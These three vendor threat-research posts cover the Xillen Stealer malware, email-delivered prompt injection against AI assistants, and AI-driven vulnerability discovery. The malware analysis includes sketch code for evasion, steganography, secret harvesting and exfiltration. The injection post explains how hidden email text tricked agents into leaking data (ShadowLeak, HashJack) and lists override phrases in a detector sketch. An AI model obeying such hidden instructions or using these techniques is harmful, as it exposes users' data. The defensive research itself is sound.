November 20, 2025

Xillen Stealer Updates to Version 5 to Evade AI Detection

Xillen Stealer v4/v5 introduces advanced features to evade AI detection, steal credentials, cryptocurrency, and sensitive data across browsers, password managers, and cloud environments. With polymorphic engines, container persistence, and behavioral mimicking, this Python-based malware highlights evolving threats and future AI integration in cybercrime campaigns.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Tara Gould
Malware Research Lead

Introduction

The Python-based information stealer “Xillen Stealer” has recently been updated to versions 4 and 5, expanding its targeting and functionality. The cross-platform infostealer, originally reported by Cyfirma in September 2025, targets sensitive data including credentials, cryptocurrency wallets, system information, and browser data, and employs anti-analysis techniques.

The update to v4/v5 includes significantly more functionality, including:

  • Persistence
  • Theft of credentials from password managers and social media accounts, browser data (history, cookies and passwords) from over 100 browsers, and cryptocurrency from over 70 wallets
  • Kubernetes configs and secrets
  • Docker scanning
  • Encryption
  • Polymorphism
  • System hooks
  • Peer-to-Peer (P2P) Command-and-Control (C2)
  • Single Sign-On (SSO) collector
  • Time-Based One-Time Passwords (TOTP) and biometric collection
  • EDR bypass
  • AI evasion
  • Interceptor for Two-Factor Authentication (2FA)
  • IoT scanning
  • Data exfiltration via Cloud APIs

Xillen Stealer is marketed on Telegram, with different licenses available for purchase. Users who deploy the malware have access to a professional-looking GUI that enables them to view exfiltrated data, logs, infections, configurations and subscription information.

Figure 1: Screenshot of the Xillen Stealer portal.

Technical analysis

The following technical analysis examines some of the interesting functions of Xillen Stealer v4 and v5. The main functionality of Xillen Stealer is to steal cryptocurrency, credentials, system information, and account information from a range of stores.

Xillen Stealer targets an extensive set of wallets and browsers, spanning over 100 browsers and more than 70 cryptocurrency wallets.

AITargetDetection

Figure 2: Screenshot of Xillen Stealer’s AI Target detection function.

The ‘AITargetDetection’ class is intended to use AI to detect high-value targets based on weighted indicators and relevant keywords defined in a dictionary. These indicators include “high value targets”, like cryptocurrency wallets, banking data, premium accounts, developer accounts, and business emails. Location indicators include high-value countries such as the United States, United Kingdom, Germany and Japan, along with cryptocurrency-friendly countries and financial hubs. Wealth indicators such as keywords like CEO, trader, investor and VIP have also been defined in a dictionary but are not in use at this time, pointing towards the group’s intent to develop further in the future.

While the class is named ‘AITargetDetection’ and includes placeholder functions for initializing and training a machine learning model, there is no actual implementation of machine learning. Instead, the system relies entirely on rule-based pattern matching for detection and scoring. Even though AI is not actually implemented in this code, it shows how malware developers could use AI in future malicious campaigns.

Figure 3: Screenshot of dead code function.
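The rule-based matching the class actually performs can be reduced to a short sketch like the one below. The keyword dictionary and weights are invented for illustration and are not the malware's real values:

```python
# Hypothetical sketch of rule-based "high-value target" scoring.
# Indicator keywords and weights are illustrative stand-ins, not
# taken from Xillen Stealer's dictionary.
INDICATORS = {
    "crypto_wallet": (["wallet", "metamask", "ledger"], 0.4),
    "business_email": (["ceo", "finance", "invoice"], 0.3),
    "developer": (["github", "aws_key", "ssh"], 0.3),
}

def score_target(text: str) -> float:
    """Return a weighted score from keyword matches; no ML is involved."""
    text = text.lower()
    score = 0.0
    for keywords, weight in INDICATORS.values():
        if any(k in text for k in keywords):
            score += weight
    return round(score, 2)
```

Despite the "AI" naming, this is the entire mechanism: a dictionary lookup and a weighted sum.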

AI Evasion

Figure 4: Screenshot of AI evasion function to create entropy variance.

‘AIEvasionEngine’ is a module designed to help malware evade AI-based or behavior-based detection systems, such as EDRs and sandboxes. It mimics legitimate user and system behavior, injects statistical noise, randomizes execution patterns, and camouflages resource usage. Its goal is to make the malware appear benign to machine learning detectors. The techniques used to achieve this are:

  • Behavioral Mimicking: Simulates user actions (mouse movement, fake browser use, file/network activity)
  • Noise Injection: Performs random memory, CPU, file, and network operations to confuse behavioral classifiers
  • Timing Randomization: Introduces irregular delays and sleep patterns to avoid timing-based anomaly detection
  • Resource Camouflage: Adjusts CPU and memory usage to imitate normal apps (such as browsers, text editors)
  • API Call Obfuscation: Random system API calls and pattern changes to hide malicious intent
  • Memory Access Obfuscation: Alters access patterns and entropy to bypass ML models monitoring memory behavior
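The timing-randomization technique, for example, can be reduced to a short sketch. The base delay and jitter values below are hypothetical:

```python
import random

# Illustrative sketch of timing randomization: instead of sleeping for
# a fixed interval between actions, each delay is drawn around a base
# value with random jitter, so execution never settles into the regular
# cadence a timing-based anomaly detector looks for. Parameters are
# hypothetical, not Xillen's actual values.
def jittered_schedule(n_actions, base=0.5, jitter=0.4, rng=None):
    """Return a list of n_actions sleep durations in seconds."""
    rng = rng or random.Random()
    return [max(0.0, base + rng.uniform(-jitter, jitter))
            for _ in range(n_actions)]

# A real implementation would call time.sleep(d) for each duration
# between malicious actions; here only the schedule is produced.
```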

PolymorphicEngine

The Polymorphic Engine is part of the “Rust Engine” available in Xillen Stealer. The ‘PolymorphicEngine’ struct implements a basic polymorphic transformation system designed for obfuscation and detection evasion. It uses predefined instruction substitutions, control-flow pattern replacements, and dead code injection to produce varied output. The mutate_code() method scans input bytes and replaces recognized instruction patterns with randomized alternatives, then applies control-flow obfuscation and inserts non-functional code to increase variability. Additional features include string encryption via XOR and a stub-based packer.
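The substitution step at the core of such an engine can be illustrated in a few lines. Xillen implements this in Rust; the sketch below uses Python for readability, and the pattern table is invented (simple x86-style equivalences), not the engine's real table:

```python
import random

# Minimal illustration of polymorphic instruction substitution: known
# byte patterns are swapped for randomly chosen, semantically
# equivalent alternatives, so each generated build hashes differently
# while behaving the same. The table is invented for illustration.
SUBSTITUTIONS = {
    b"\x90": [b"\x90", b"\x87\xc0"],          # nop -> nop | xchg eax,eax
    b"\x31\xc0": [b"\x31\xc0", b"\x29\xc0"],  # xor eax,eax -> sub eax,eax
}

def mutate_code(code: bytes, rng=None) -> bytes:
    rng = rng or random.Random()
    out, i = bytearray(), 0
    while i < len(code):
        for pattern, choices in SUBSTITUTIONS.items():
            if code.startswith(pattern, i):
                out += rng.choice(choices)  # pick a random equivalent
                i += len(pattern)
                break
        else:
            out.append(code[i])  # unrecognized byte passes through
            i += 1
    return bytes(out)
```

A real engine layers control-flow obfuscation and dead-code insertion on top of this substitution pass.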

Collectors

DevToolsCollector

Figure 5: Screenshot of Kubernetes data function.

The ‘DevToolsCollector’ is designed to collect sensitive data related to a wide range of developer tools and environments. This includes:

IDE configurations

  • VS Code, VS Code Insiders, Visual Studio
  • JetBrains: IntelliJ, PyCharm, WebStorm
  • Sublime
  • Atom
  • Notepad++
  • Eclipse

Cloud credentials and configurations

  • AWS
  • GCP
  • Azure
  • Digital Ocean
  • Heroku

SSH keys

Docker & Kubernetes configurations

Git credentials

Database connection information

  • HeidiSQL
  • Navicat
  • DBeaver
  • MySQL Workbench
  • pgAdmin

API keys from .env files

FTP configs

  • FileZilla
  • WinSCP
  • Core FTP

VPN configurations

  • OpenVPN
  • WireGuard
  • NordVPN
  • ExpressVPN
  • CyberGhost
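The .env harvesting mentioned above follows a common collector pattern: walk well-known paths and match key names against a secrets pattern. A minimal sketch, with an illustrative regex rather than the malware's actual code:

```python
import re
from pathlib import Path

# Sketch of .env secret harvesting: recursively find .env files under
# a root directory and pull KEY=value pairs whose names look like
# secrets. The regex is an illustrative assumption.
SECRET_RE = re.compile(
    r"^(?P<key>\w*(KEY|TOKEN|SECRET|PASSWORD)\w*)=(?P<val>.+)$",
    re.IGNORECASE | re.MULTILINE,
)

def scan_env_files(root: Path) -> dict:
    found = {}
    for env_file in root.rglob(".env"):
        try:
            text = env_file.read_text(encoding="utf-8", errors="ignore")
        except OSError:
            continue  # unreadable files are skipped silently
        for m in SECRET_RE.finditer(text):
            found[m.group("key")] = m.group("val")
    return found
```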

Container persistence

Figure 6: Screenshot of Kubernetes inject function.

Biometric Collector

Figure 7: Screenshot of the ‘BiometricCollector’ function.

The ‘BiometricCollector’ attempts to collect biometric information from Windows systems by scanning the C:\Windows\System32\WinBioDatabase directory, which stores Windows Hello and other biometric configuration data. If accessible, it reads the contents of each file and encodes them in Base64, preparing them for later exfiltration. While this data is typically encrypted by Windows, its collection indicates an attempt to extract sensitive biometric data.
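This staging step, reading each file in binary mode and Base64-encoding it, is a pattern repeated across Xillen's collectors and can be sketched as follows. The directory is parameterized here for illustration; the malware hard-codes WinBioDatabase:

```python
import base64
from pathlib import Path

# Sketch of the collector's staging step: read every file in a target
# directory in binary mode and Base64-encode the contents so they can
# be embedded in a later exfiltration payload.
def stage_directory(directory: Path) -> dict:
    staged = {}
    for path in directory.iterdir():
        if path.is_file():
            try:
                staged[path.name] = base64.b64encode(path.read_bytes()).decode()
            except OSError:
                continue  # locked or ACL-protected files are skipped
    return staged
```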

Password Managers

The ‘PasswordManagerCollector’ function attempts to steal credentials stored in password managers including OnePass, LastPass, BitWarden, Dashlane, NordPass and KeePass. However, this function is limited to Windows systems.

SSOCollector

The ‘SSOCollector’ class is designed to collect authentication tokens related to SSO systems. It targets three main sources: Azure Active Directory tokens stored under TokenBroker\Cache, Kerberos tickets obtained through the klist command, and Google Cloud authentication data in user configuration folders. For each source, it checks known directories or commands, reads partial file contents, and stores the results in a dictionary. Once again, this function is limited to Windows systems.

TOTP Collector

The ‘TOTP Collector’ class attempts to collect TOTPs from:

  • Authy Desktop by locating and reading from Authy.db SQLite databases
  • Microsoft Authenticator by scanning known application data paths for stored binary files
  • TOTP-related Chrome extensions by searching LevelDB files for identifiable keywords like “gauth” or “authenticator”.

Each method attempts to locate relevant files, parse or partially read their contents, and store them in a dictionary under labels like authy, microsoft_auth, or chrome_extension. However, as before, this is limited to Windows, and there is no handling for encrypted tokens.

Enterprise Collector

The ‘EnterpriseCollector’ class is used to extract credentials related to an enterprise Windows system. It targets configuration and credential data from:

  • VPN clients
    • Cisco AnyConnect, OpenVPN, Forticlient, Pulse Secure
  • RDP credentials
  • Corporate certificates
  • Active Directory tokens
  • Kerberos tickets cache

The files and directories are located based on standard environment variables, with their contents read in binary mode and then encoded in Base64.

Super Extended Application Collector

The ‘SuperExtendedApplicationCollector’ class is designed to scan an environment for 160 different applications on a Windows system. It iterates through the paths of a wide range of software categories including messaging apps, cryptocurrency wallets, password managers, development tools, enterprise tools, gaming clients, and security products. The list includes Teams, Slack, Mattermost, Zoom, Google Meet, MS Office, Defender, Norton, McAfee, Steam, Twitch, and VMware, among others.

Bypass

AppBoundBypass

This code outlines a framework for bypassing App-Bound Encryption, Google Chrome's cookie protection. The ‘AppBoundBypass’ class attempts several evasion techniques, including memory injection, dynamic-link library (DLL) hijacking, process hollowing, atom bombing, and process doppelgänging to impersonate or hijack browser processes. At the time of writing, the code contains multiple placeholders, indicating that it is still in development.

Steganography

The ‘SteganographyModule’ uses steganography (hiding data inside other files and structures) to conceal the stolen data, staging it for exfiltration. Multiple methods are implemented, including:

  • Image steganography: LSB-based hiding
  • NTFS Alternate Data Streams
  • Windows Registry Keys
  • Slack space: Writing into unallocated disk cluster space
  • Polyglot files: Appending archive data to images
  • Image metadata: Embedding data in EXIF tags
  • Whitespace encoding: Hiding binary in trailing spaces of text files
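The first of these methods, LSB-based hiding, replaces the least-significant bit of each carrier byte with one bit of payload. A minimal sketch over a raw byte buffer (a real implementation would operate on decoded pixel data from an image library):

```python
# Minimal illustration of LSB steganography: each payload bit replaces
# the least-significant bit of one carrier byte. Changing only the LSB
# leaves the visible image essentially unchanged.
def lsb_embed(pixels: bytearray, payload: bytes) -> bytearray:
    bits = [(byte >> i) & 1 for byte in payload for i in range(7, -1, -1)]
    if len(bits) > len(pixels):
        raise ValueError("carrier too small for payload")
    out = bytearray(pixels)
    for i, bit in enumerate(bits):
        out[i] = (out[i] & 0xFE) | bit  # clear LSB, then set payload bit
    return out

def lsb_extract(pixels: bytearray, n_bytes: int) -> bytes:
    bits = [p & 1 for p in pixels[: n_bytes * 8]]
    return bytes(
        sum(bit << (7 - j) for j, bit in enumerate(bits[i:i + 8]))
        for i in range(0, len(bits), 8)
    )
```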

Exfiltration

CloudProxy

Figure 8: Screenshot of the ‘CloudProxy’ class.

The ‘CloudProxy’ class is designed for exfiltrating data by routing it through cloud service domains. It encodes the input data using Base64, attaches a timestamp and SHA-256 signature, and attempts to send this payload as a JSON object via HTTP POST requests to cloud URLs including AWS, GCP, and Azure, allowing the traffic to blend in with legitimate cloud service requests. At the time of writing, these public-facing URLs do not accept POST requests, indicating that they are placeholders meant to be replaced with attacker-controlled cloud endpoints in a finalized build.
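The payload construction described can be sketched as follows. The field names are illustrative assumptions, and the actual POST request is omitted:

```python
import base64
import hashlib
import json
import time

# Sketch of the CloudProxy payload construction: Base64-encode the
# stolen data, attach a timestamp and a SHA-256 digest, and wrap the
# result as JSON ready for an HTTP POST to a cloud-styled endpoint.
# Field names are illustrative, not taken from the malware.
def build_payload(data: bytes) -> str:
    encoded = base64.b64encode(data).decode()
    payload = {
        "data": encoded,
        "timestamp": int(time.time()),
        "signature": hashlib.sha256(encoded.encode()).hexdigest(),
    }
    return json.dumps(payload)
```

Routing such requests through well-known cloud domains is what lets the exfiltration traffic blend into ordinary outbound activity.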

P2PEngine

Figure 9: Screenshot of the P2PEngine.

The ‘P2PEngine’ provides multiple methods of C2, including embedding instructions within blockchain transactions (such as Bitcoin OP_RETURN, Ethereum smart contracts), exfiltrating data via anonymizing networks like Tor and I2P, and storing payloads on IPFS (a distributed file system). It also supports domain generation algorithms (DGA) to create dynamic .onion addresses for evading detection.
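The DGA component can be illustrated with a simple sketch: implant and operator derive the same daily address list from a shared seed, so no rendezvous point needs to be hard-coded. The derivation below is invented for illustration and is not Xillen's algorithm; the 16-character labels resemble legacy v2 onion names, whereas real v3 addresses are 56-character strings with a different derivation:

```python
import base64
import hashlib

# Illustrative DGA for .onion-style rendezvous addresses: hash a shared
# seed, the current date, and a counter, then Base32-encode the digest
# into a domain-safe label. Deterministic, so both sides can compute
# the same list independently.
def dga_onion(seed: str, date: str, count: int = 3) -> list:
    domains = []
    for i in range(count):
        digest = hashlib.sha256(f"{seed}:{date}:{i}".encode()).digest()
        label = base64.b32encode(digest).decode().lower()[:16]
        domains.append(label + ".onion")
    return domains
```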

After a compromise, the stealer creates both HTML and TXT reports containing the stolen data. It then sends these reports to the attacker’s designated Telegram account.

Xillen Killers

Figure 10: Xillen Killers.

Xillen Stealer appears to be developed by a self-described 15-year-old “pentest specialist”, “BengaminButton”, who creates TikTok videos showing basic exploits and open-source intelligence (OSINT) techniques. The group distributing the information stealer, known as “Xillen Killers”, claims to have 3,000 members. Additionally, the group claims to have been involved in:

  • Analysis of Project DDoSia, a tool reportedly used by the NoName057(16) group, revealing that rather than functioning as a distributed denial-of-service (DDoS) tool, it is actually a remote access trojan (RAT) and stealer, along with the identification of involved individuals.
  • Compromise of doxbin.net in October 2025.
  • Discovery of vulnerabilities on a Russian mods site and a Ukrainian news site.

The group, which claims to be part of the Russian IT scene, uses Telegram for logging, marketing, and support.

Conclusion

While some components of XillenStealer remain underdeveloped, the breadth of its intended feature set, which includes credential harvesting, cryptocurrency theft, container targeting, and anti-analysis techniques, suggests that once fully developed it could become a sophisticated stealer. The intention to use AI to improve targeting in malware campaigns, even though not yet implemented, indicates how threat actors are likely to incorporate AI into future campaigns.

Credit to Tara Gould (Threat Research Lead)
Edited by Ryan Traill (Analyst Content Lead)

Appendices

Indicators of Compromise (IoCs)

395350d9cfbf32cef74357fd9cb66134 - confid.py

f3ce485b669e7c18b66d09418e979468 - stealer_v5_ultimate.py

3133fe7dc7b690264ee4f0fb6d867946 - xillen_v5.exe

https://github[.]com/BengaminButton/XillenStealer

https://github[.]com/BengaminButton/XillenStealer/commit/9d9f105df4a6b20613e3a7c55379dcbf4d1ef465

MITRE ATT&CK

ID - Technique

T1059.006 - Command and Scripting Interpreter: Python

T1555 - Credentials from Password Stores

T1555.003 - Credentials from Password Stores: Credentials from Web Browsers

T1555.005 - Credentials from Password Stores: Password Managers

T1649 - Steal or Forge Authentication Certificates

T1558 - Steal or Forge Kerberos Tickets

T1539 - Steal Web Session Cookie

T1552.001 - Unsecured Credentials: Credentials In Files

T1552.004 - Unsecured Credentials: Private Keys

T1552.005 - Unsecured Credentials: Cloud Instance Metadata API

T1217 - Browser Information Discovery

T1622 - Debugger Evasion

T1082 - System Information Discovery

T1497.001 - Virtualization/Sandbox Evasion: System Checks

T1115 - Clipboard Data

T1001.002 - Data Obfuscation: Steganography

T1567 - Exfiltration Over Web Service

T1657 - Financial Theft




May 1, 2026

How email-delivered prompt injection attacks can target enterprise AI – and why it matters


What are email-delivered prompt injection attacks?

As organizations rapidly adopt AI assistants to improve productivity, a new class of cyber risk is emerging alongside them: email-delivered AI prompt injection. Unlike traditional attacks that target software vulnerabilities or rely on social engineering, this is the act of embedding malicious or manipulative instructions into content that an AI system will process as part of its normal workflow. Because modern AI tools are designed to ingest and reason over large volumes of data, including emails, documents, and chat histories, they can unintentionally treat hidden attacker-controlled text as legitimate input.  

At Darktrace, our analysis has shown an increase of 90% in the number of customer deployments showing signals associated with potential prompt injection attempts since we began monitoring for this type of activity in late 2025. While it is not always possible to definitively attribute each instance, internal scoring systems designed to identify characteristics consistent with prompt injection have recorded a growing number of high-confidence matches. The upward trend suggests that attackers are actively experimenting with these techniques.

Recent examples of prompt injection attacks

Two early examples of this evolving threat are HashJack and ShadowLeak, which illustrate prompt injection in practice.

HashJack is a novel prompt injection technique discovered in November 2025 that exploits AI-powered web browsers and agentic AI browser assistants. By hiding malicious instructions within the URL fragment (after the # symbol) of a legitimate, trusted website, attackers can trick AI web assistants into performing malicious actions – potentially inserting phishing links, fake contact details, or misleading guidance directly into what appears to be a trusted AI-generated output.

ShadowLeak, identified in September 2025, is a prompt injection method used to exfiltrate personally identifiable information (PII). It exploited a flaw in ChatGPT (now patched by OpenAI) via an agent connected to email. If attackers sent the target an email containing a hidden prompt, the agent was tricked into leaking sensitive information to the attacker with no user action or visible UI.

What’s the risk of email-delivered prompt injection attacks?

Enterprise AI assistants often have complete visibility across emails, documents, and internal platforms. This means an attacker does not need to compromise credentials or move laterally through an environment. If successful, they can influence the AI to retrieve relevant information seamlessly, without the labor of compromise and privilege escalation.

The first risk is data exfiltration. In a prompt injection scenario, malicious instructions may be embedded within an ordinary email. As in the ShadowLeak attack, when AI processes that content as part of a legitimate task, it may interpret the hidden text as an instruction. This could result in the AI disclosing sensitive data, summarizing confidential communications, or exposing internal context that would otherwise require significant effort to obtain.

The second risk is agentic workflow poisoning. As AI systems take on more active roles, prompt injection can influence how they behave over time. An attacker could embed instructions that persist across interactions, such as causing the AI to include malicious links in responses or redirect users to untrusted resources. In this way, the attacker inserts themselves into the workflow, effectively acting as a man-in-the-middle within the AI system.

Why can’t other solutions catch email-delivered prompt injection attacks?

AI prompt injection challenges many of the assumptions that traditional email security is built on. It does not fit the usual patterns of phishing, where the goal is to trick a user into clicking a link or opening an attachment.  

Most security solutions are designed to detect signals associated with user engagement: suspicious links, unusual attachments, or social engineering cues. Prompt injection avoids these indicators entirely, meaning there are fewer obvious red flags.

In this case, the intention is actually the opposite of user solicitation. The objective is simply for the email to be delivered and remain in the inbox, appearing benign and unremarkable. The malicious element is not something the recipient is expected to engage with, or even notice.

Detection is further complicated by the nature of the prompts themselves. Unlike known malware signatures or consistent phishing patterns, injected prompts can vary widely in structure and wording. This makes simple pattern-matching approaches, such as regex, unreliable. A broad rule set risks generating large numbers of false positives, while a narrow one is unlikely to capture the diversity of possible injections.

How does Darktrace catch these types of attacks?

Darktrace's approach to email security is to look beyond individual indicators and assess context, and the same principle applies here.

For example, our prompt density score identifies clusters of prompt-like language within an email rather than just single occurrences. Instead of treating the presence of a phrase as a blocking signal, the focus is on whether there is an unusual concentration of these patterns in a way that suggests injection. Additional weighting can be applied where there are signs of obfuscation. For example, text that is hidden from the user – such as white font or font size zero – but still readable by AI systems can indicate an attempt to conceal malicious prompts.
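The idea of a density score, flagging a concentration of prompt-like phrases rather than any single match, can be sketched roughly as below. The phrase list, window size, and threshold are invented for illustration; Darktrace's actual scoring is not public:

```python
# Hypothetical sketch of a prompt-density heuristic: rather than
# blocking on any single phrase, count how many prompt-like phrases
# fall within a short span of text and flag only dense clusters.
PROMPT_PHRASES = [
    "ignore previous instructions", "you are an ai", "system prompt",
    "do not tell the user", "forward this to",
]

def prompt_density(text: str, window: int = 500) -> int:
    """Max number of phrase hits within any `window`-character span."""
    lowered = text.lower()
    positions = []
    for phrase in PROMPT_PHRASES:
        start = lowered.find(phrase)
        while start != -1:
            positions.append(start)
            start = lowered.find(phrase, start + 1)
    positions.sort()
    best = 0
    for i, p in enumerate(positions):
        j = i
        while j < len(positions) and positions[j] - p <= window:
            j += 1
        best = max(best, j - i)
    return best

def looks_injected(text: str, threshold: int = 3) -> bool:
    return prompt_density(text) >= threshold
```

A single stray phrase in a long email scores low, while a cluster of instructions aimed at an AI reader stands out, which keeps false positives down compared to simple pattern matching.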

This is combined with broader behavioral signals. The same communication context used to detect other threats remains relevant, such as whether the content is unusual for the recipient or deviates from normal patterns.

Ask your email provider about email-delivered AI prompt injection

Prompt injection targets not just employees, but the AI systems they rely on, so security approaches need to account for both.

Though there are clear indications of emerging activity, it remains to be seen how popular prompt injection will be with attackers going forward. Still, considering the potential impact of this attack type, it’s worth checking if this risk has been considered by your email security provider.

Questions to ask your email security provider

  • What safeguards are in place to prevent emails from influencing AI‑driven workflows over time?
  • How do you assess email content that’s benign for a human reader, but may carry hidden instructions intended for AI systems?
  • If an email contains no links, no attachments, and no social engineering cues, what signals would your platform use to identify malicious intent?

Visit the Darktrace / EMAIL product hub to discover how we detect and respond to advanced communication threats.  

Learn more about securing AI in your enterprise.

About the author
Kiri Addison
Senior Director of Product


April 30, 2026

Mythos vs Ethos: Defending in an Era of AI‑Accelerated Vulnerability Discovery


Anthropic’s Mythos and what it means for security teams

Recent attention on systems such as Anthropic's Mythos highlights a notable problem for defenders: disclosure's role in coordinating defensive action is eroding.

As AI systems gain stronger reasoning and coding capability, their usefulness in analyzing complex software environments and identifying weaknesses naturally increases. What has changed is not attacker motivation, but the conditions under which defenders learn about and organize around risk. Vulnerability discovery and exploitation increasingly unfold in ways that turn disclosure into a retrospective signal rather than a reliable starting point for defense.

Faster discovery was inevitable and is already visible

The acceleration of vulnerability discovery was already observable across the ecosystem. Publicly disclosed vulnerabilities (CVEs) have grown at double-digit rates for the past two years, including a 32% increase in 2024 according to NIST, driven in part by AI even prior to Anthropic's Mythos model. Most notably, XBOW topped the HackerOne US bug bounty leaderboard, marking the first time an autonomous penetration tester had done so.

The technical frontier for AI capabilities has been described elsewhere as jagged, and the implication is that Mythos is exceptional but not unique in this capability. While Mythos appears to make significant progress in complex vulnerability analysis, many other models are already able to find and exploit weaknesses to varying degrees.  

What matters here is not which model performs best, but the fact that vulnerability discovery is no longer a scarce or tightly bounded capability.

The consequence of this shift is not simply earlier discovery. It is a change in the defender-attacker race condition. Disclosure once acted as a rough synchronization point. While attackers sometimes had earlier knowledge, disclosure generally marked the moment when risk became visible and defensive action could be broadly coordinated. Increasingly, that coordination will no longer exist. Exploitation may be underway well before a CVE is published, if it is published at all.

Why patch velocity alone is not the answer

The instinctive response to this shift is to focus on patching faster, but treating patch velocity as the primary solution misunderstands the problem. Most organizations are already constrained in how quickly they can remediate vulnerabilities. Asset sprawl, operational risk, testing requirements, uptime commitments, and unclear ownership all limit response speed, even when vulnerabilities are well understood.

If discovery and exploitation now routinely precede disclosure, then patching cannot be the first line of defense. It becomes one necessary control applied within a timeline that has already shifted. This does not imply that organizations should patch less. It means that patching cannot serve as the organizing principle for defense.

Defense needs a more stable anchor

If disclosure no longer defines when defense begins, then defense needs a reference point that does not depend on knowing the vulnerability in advance.  

Every digital environment has a behavioral character. Systems authenticate, communicate, execute processes, and access resources in relatively consistent ways over time. These patterns are not static rules or signatures. They are learned behaviors that reflect how an organization operates.

When exploitation occurs, even via previously unknown vulnerabilities, those behavioral patterns change.

Attackers may use novel techniques, but they still need to gain access, create processes, move laterally, and will ultimately interact with systems in ways that diverge from what is expected. That deviation is observable regardless of whether the underlying weakness has been formally named.

In an environment where disclosure can no longer be relied on for timing or coordination, behavioral understanding is no longer an optional enhancement; it becomes the only consistently available defensive signal.

Detecting risk before disclosure

Darktrace’s threat research has consistently shown that malicious activity often becomes visible before public disclosure.

In multiple cases, including exploitation of Ivanti, SAP NetWeaver, and Trimble Cityworks, Darktrace detected anomalous behavior days or weeks ahead of CVE publication. These detections did not rely on signatures, threat intelligence feeds, or awareness of the vulnerability itself. They emerged because systems began behaving in ways that did not align with their established patterns.

This reflects a defensive approach grounded in ‘Ethos’, in contrast to the unbounded exploration represented by ‘Mythos’. Here, Mythos describes continuous vulnerability discovery at speed and scale. Ethos reflects an understanding of what is normal and expected within a specific environment, grounded in observed behavior.

Revisiting assume breach

These conditions reinforce a principle long embedded in Zero Trust thinking: assume breach.

If exploitation can occur before disclosure, patching vulnerabilities can no longer act as the organizing principle for defense. Instead, effective defense must focus on monitoring for misuse and constraining attacker activity once access is achieved. Behavioral monitoring allows organizations to identify early‑stage compromise and respond while uncertainty remains, rather than waiting for formal verification.

AI plays a critical role here, not by predicting every exploit, but by continuously learning what normal looks like within a specific environment and identifying meaningful deviation at machine speed. Identifying that deviation enables defenders to respond by constraining activity back towards normal patterns of behavior.

Not an arms race, but an asymmetry

AI is often framed as fueling an arms race between attackers and defenders. In practice, the more important dynamic is asymmetry.

Attackers operate broadly, scanning many environments for opportunities. Defenders operate deeply within their own systems, and it’s this business context which is so significant. Behavioral understanding gives defenders a durable advantage. Attackers may automate discovery, but they cannot easily reproduce what belonging looks like inside a particular organization.

A changed defensive model

AI‑accelerated vulnerability discovery does not mean defenders have lost. It does mean that disclosure‑driven, patch‑centric models no longer provide a sufficient foundation for resilience.

As vulnerability volumes grow and exploitation timelines compress, effective defense increasingly depends on continuous behavioral understanding, detection that does not rely on prior disclosure, and rapid containment to limit impact. In this model, CVEs confirm risk rather than define when defense begins.

The industry has already seen this approach work in practice. As AI continues to reshape both offense and defense, behavioral detection will move from being complementary to being essential.

About the author
Andrew Hollister
Principal Solutions Engineer, Cyber Technician